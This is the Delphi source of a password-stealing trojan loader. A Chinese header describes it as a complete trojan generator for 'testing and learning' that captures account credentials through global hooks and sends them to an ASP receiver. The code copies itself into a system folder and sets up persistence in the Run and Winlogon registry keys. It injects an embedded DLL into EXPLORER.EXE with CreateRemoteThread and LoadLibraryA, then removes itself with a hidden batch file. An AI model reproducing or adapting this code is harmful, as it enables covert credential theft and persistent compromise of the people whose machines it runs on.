main.dpr

面对面 木马生成器 完整代码 程序仅提供测试学习 全局钩子查找句柄截获 使用ASP收信 收信地址明文（测试而已没加密） //本软件主要是截获账号和密码 带了个简单发信

program Main;

uses
  windows,
  RejoiceBase,
  SysUtils2,
  SysUtils,
  tlhelp32,
  Reg;

{$L 'SRT.obj'}
{$R RSRC.RES}

{$warn   SYMBOL_PLATFORM   OFF}   //这个警告关掉  [警告] main.DPR(130): Symbol 'FileSetAttr' is specific to a platform

var
  ExeFiles: PChar = '123.exe';    //EXE名称
  DLLFiles: PChar = '123.dll';    //DLL名称
  IEFiles: PChar  = 'EXPLORER.EXE';    //宿主 注入进程名称

  PID: DWORD;
  Process: DWORD;
  DllAllpath: string;
  StartInfo: TStartupInfo;
  ProcInfo: TProcessInformation;

function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;

function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;

function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';

function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;


//----------------修改文件时间函数
procedure ExtDelMe;      //带删除自身功能
var
  F: textfile;
  BatchFileName: string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
  BatchFileName := Gesy + 'Deleteme.bat';
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, ':try');
  WriteLn(F, 'del "' + ParamStr(0) + '"');
  WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
  WriteLn(F, 'del %0');
  CloseFile(F);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
  begin
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
  end;
end;

function RandomFilename(aFilename: string): string;     //随意定义个文件名称
var
  Path, Filename, Ext: string;
begin
  Result := aFilename;
  Path := ExtractFilepath(aFilename);
  Ext := ExtractFileExt(aFilename);
  Filename := ExtractFilename(aFilename);
  if Length(Ext) > 0 then
    Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));
  repeat
    Result := Path + Filename + inttoStr(Random(9999)) + Ext;
  until not FileExists(Result);
end;

function GetProcessID(sProcName: string): Integer;
var
  hProcSnap: THandle;
  pe32: TProcessEntry32;
begin
  Result := -1;
  hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
  if hProcSnap = INVALID_HANDLE_VALUE then Exit;
  pe32.dwSize := SizeOf(ProcessEntry32);
  if Process32First(hProcSnap, pe32) = True then
    while Process32Next(hProcSnap, pe32) = True do
    begin
      if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
      begin
        Result := pe32.th32ProcessID;
        break;
      end;
    end;
  CloseHandle(hProcSnap);
end;



//插入进程
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
  BytesWritten: DWORD;
  Thread: DWORD;
  ThreadID: DWORD;
  Parameters: Pointer;
begin
  Result := False;
  Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
  if Parameters = nil then Exit;
  WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
  Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
  WaitForSingleObject(Thread, INFINITE);
  xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
  if Thread = 0 then Exit;
  CloseHandle(Thread);
  Result := True;
end;

var
  isSetup: Bool;
  SetupPathName: string;
begin
  SetupPathName := Gesy + ExeFiles;
  if (CompareText(paramstr(0), SetupPathName) <> 0) then
  begin
    try
      if FileExists(SetupPathName) then
      begin
        FilesetAttr(SetupPathName, 0);     //指定文件的属性参数 成功为0
        DeleteFile(SetupPathName);
        if FileExists(SetupPathName) then
        begin
          Halt;  //停止
          Exit;  //退出
        end;
      end;
      CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
    except
    end;
    isSetup := True;
    if judgesys = 3 then
    begin
      Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'alalmn-Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
    end
    else
    begin
      Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
    end;
  end;
  if FindWindow('Rejoice_3.2', 'Windows IDE') = 0 then
  begin
    DllAllpath := Gesy + DLLFiles;      //DLL名称给DllAllpath
    try
      FilesetAttr(DllAllpath, 0);  //指定文件的属性参数 成功为0
      DeleteFile(DllAllpath); {删除现有的DLL文件}
    except
    end;
    if FileExists(DllAllpath) then {如果删除失败，则改名}
    begin
      DllAllpath := RandomFilename(DllAllpath);   //使用RandomFilename函数随意定义一个名字
    end;
    if ExtractRes('dllfile', 'mydll', DllAllpath) then {生成新的DLL插入文件}
    begin
    if IEFiles = 'IEXPLORE.EXE' then    //注入IE进程 IEXPLORE.EXE 进程
      CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);   //注入IE 应为为真只读取第1行 下面的全部都是以假读取
      PID := GetProcessID(IEFiles);        //注入EXPLORER.EXE进程
      Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}   //注入EXPLORER.EXE进程
      FilesetAttr(DllAllpath, 0);      //指定文件的属性参数 成功为0    //注入EXPLORER.EXE进程
      InjectLibrary(Process, Pchar(DllAllpath));   //注入EXPLORER.EXE进程
    end;
  end;
  if isSetup then    //插入进程插入为真
  Begin
  ExtDelMe; //修改时间函数
  end;
  Halt;  //停止
end.